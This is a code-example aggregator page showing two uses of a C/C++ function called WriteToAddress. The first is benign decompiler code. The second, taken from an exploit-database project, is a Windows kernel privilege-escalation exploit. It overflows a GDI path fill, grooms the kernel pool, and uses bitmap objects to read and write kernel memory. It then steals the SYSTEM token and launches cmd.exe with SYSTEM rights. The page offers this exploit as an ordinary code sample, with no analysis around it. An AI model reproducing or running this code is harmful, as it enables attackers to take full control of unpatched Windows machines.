C++ (Cpp) WriteToAddress Examples

Programming Language: C++ (Cpp)

Method/Function: WriteToAddress

Examples at hotexamples.com: 2

C++ (Cpp) WriteToAddress - 2 examples found. These are the top rated real world C++ (Cpp) examples of WriteToAddress extracted from open source projects. You can rate examples to help us improve the quality of examples.

Example #1

Show file

File: CCodeList.cpp Project: JFreaker/exetoc

PINSTR	CCodeList_Maker::Code_general(int type, HLType t)
{	//	只有type == enum_RR时，返回值才有用
    if (t == i_Unknown)
    {
        t=i_Unknown;
    }
	PINSTR	p = new INSTR;  //new_INSTR
	p->type = t;
	switch (type)
	{
	case enum_00:
		InstrAddTail(p);
		return p;
	case enum_RR:
		{
			TransVar(&p->var_r1, 0);	//	0 means	xcpu.op[0]
			TransVar(&p->var_r2, 1);	//	1 means	xcpu.op[1]
			VarRead(p->va_r1);
			VarRead(p->va_r2);
		}
		InstrAddTail(p);
		return p;
	case enum_WR:
		{
			TransVar(&p->var_w, 0);	//	0 means	xcpu.op[0]
			TransVar(&p->var_r1, 1);	//	1 means	xcpu.op[1]
			if (t == i_Lea)
			{
				p->type = i_Assign;
				if (p->var_r1.type != v_Tem)
				{	//	比如象 lea eax,[ebp]
					p->type = i_GetAddr;
				}
			}
			else
			{
				VarRead(p->va_r1);
				//VarWrite(&p->var_w);
				if (p->var_w.type == v_Tem)
				{
					WriteToAddress(p);
					return NULL;	//	因为这里没人会用这个返回值
				}
			}
		}
		InstrAddTail(p);
		return p;
	case enum_AR:
		{
			VAR v;
			TransVar(&v, 0);	//	0 means	xcpu.op[0]
			TransVar(&p->var_r2, 1);	//	1 means	xcpu.op[1]
			p->var_r1 = v;
			p->var_w = v;
			VarRead(p->va_r2);
			VarRead(p->va_r1);
			//VarWrite(&p->var_w);
			if (p->var_w.type == v_Tem)
			{
				WriteToAddress(p);
				return NULL;	//	因为这里没人会用这个返回值
			}
		}
		InstrAddTail(p);
		return p;
	default:
		alert("why here 325426");
		return NULL;
	}
	//return NULL;
}

Example #2

Show file

File: 41020.c Project: AlexxNica/exploit-database

void main(int argc, char* argv[]) {
	HDC hdc = GetDC(NULL);
	HDC hMemDC = CreateCompatibleDC(hdc);
	HGDIOBJ bitmap = CreateBitmap(0x5a, 0x1f, 1, 32, NULL);
	HGDIOBJ bitobj = (HGDIOBJ)SelectObject(hMemDC, bitmap);

	static POINT points[0x3fe01];

	for (int l = 0; l < 0x3FE00; l++) {
		points[l].x = 0x5a1f;
		points[l].y = 0x5a1f;
	}
	points[2].y = 20;
	points[0x3FE00].x = 0x4a1f;
	points[0x3FE00].y = 0x6a1f;

	if (!BeginPath(hMemDC)) {
		fprintf(stderr, "[!] BeginPath() Failed: %x\r\n", GetLastError());
	}	

	for (int j = 0; j < 0x156; j++) {
		if (j > 0x1F && points[2].y != 0x5a1f) {
			points[2].y = 0x5a1f;
		}
		if (!PolylineTo(hMemDC, points, 0x3FE01)) {
			fprintf(stderr, "[!] PolylineTo() Failed: %x\r\n", GetLastError());
		}
	}

	EndPath(hMemDC);
	//Kernel Pool Fung=Shuei
	fungshuei();
	//getchar();
	
	fprintf(stdout, "[+] Trigerring Exploit.\r\n");
	if (!FillPath(hMemDC)) {
			fprintf(stderr, "[!] FillPath() Failed: %x\r\n", GetLastError());
		}
	printf("%s\r\n", "Done filling.");

	HRESULT res;
	VOID *fake = VirtualAlloc(0x0000000100000000, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	if (!fake) {
		fprintf(stderr, "VirtualAllocFailed. %x\r\n", GetLastError());
	}
	memset(fake, 0x1, 0x100);
	
	bits = malloc(0x1000);
	memset(bits, 0x42, 0x1000);
	for (int k=0; k < 5000; k++) {

		res = GetBitmapBits(bitmaps[k], 0x1000, bits); //1685 * 2 * 1 + 1
		if (res > 0x150) {
			fprintf(stdout, "GetBitmapBits Result. %x\r\nindex: %d\r\n", res, k);
			hManager = bitmaps[k];
			hWorker = bitmaps[k + 1];

			// Get Gh05 header to fix overflown header.
			static BYTE Gh04[0x9];
			fprintf(stdout, "\r\nGh04 header:\r\n");
			for (int i = 0; i < 0x10; i++){
				Gh04[i] = bits[0x1d0 + i];
				fprintf(stdout, "%02x", bits[0x1d0 + i]);
			}
			
			// Get Gh05 header to fix overflown header.
			static BYTE Gh05[0x9];
			fprintf(stdout, "\r\nGh05 header:\r\n");
			for (int i = 0; i < 0x10; i++) {
				Gh05[i] = bits[0xd90 + i];
				fprintf(stdout, "%02x", bits[0xd90 + i]);
			}

			// Address of Overflown Gh04 object header
			static BYTE addr1[0x7];
			fprintf(stdout, "\r\nPrevious page Gh04 (Leaked address):\r\n");
			for (int j = 0; j < 0x8; j++) {
				addr1[j] = bits[0x210 + j];
				fprintf(stdout, "%02x", bits[0x210 + j]);
			}
			//Get pvscan0 address of second Gh05 object
			static BYTE* pvscan[0x07];
			fprintf(stdout, "\r\nPvsca0:\r\n");
			for (int i = 0; i < 0x8; i++) {
				pvscan[i] = bits[0xdf0 + i];
				fprintf(stdout, "%02x", bits[0xdf0 + i]);
			}

			// Calculate address to overflown Gh04 object header.
			addr1[0x0] = 0;
			int u = addr1[0x1];
			u = u - 0x10;
			addr1[1] = u;
			
			//Fix overflown Gh04 object Header
			SetAddress(addr1);
			WriteToAddress(Gh04);

			// Calculate address to overflown Gh05 object header.
			addr1[0] = 0xc0;
			int y = addr1[1];
			y = y + 0xb;
			addr1[1] = y;

			//Fix overflown Gh05 object Header
			SetAddress(addr1);
			WriteToAddress(Gh05);

			// get System EPROCESS
			ULONG64 SystemEPROCESS = PsInitialSystemProcess();
			//fprintf(stdout, "\r\n%x\r\n", SystemEPROCESS);
			ULONG64 CurrentEPROCESS = PsGetCurrentProcess();
			//fprintf(stdout, "\r\n%x\r\n", CurrentEPROCESS);
			ULONG64 SystemToken = 0;
			// read token from system process
			ReadFromAddress(SystemEPROCESS + gConfig.TokenOffset, (BYTE *)&SystemToken, 0x8);
			// write token to current process
			ULONG64 CurProccessAddr = CurrentEPROCESS + gConfig.TokenOffset;
			SetAddress((BYTE *)&CurProccessAddr);
			
			WriteToAddress((BYTE *)&SystemToken);
			// Done and done. We're System :)
			system("cmd.exe");
			
			break;
		}
		if (res == 0) {
			fprintf(stderr, "GetBitmapBits failed. %x\r\n", GetLastError());
		}
	}
	getchar();
	//clean up
	DeleteObject(bitobj);
	DeleteObject(bitmap);
	DeleteDC(hMemDC);
	ReleaseDC(NULL, hdc);
	VirtualFree(0x0000000100000000, 0x100, MEM_RELEASE);
	//free(points);
	
}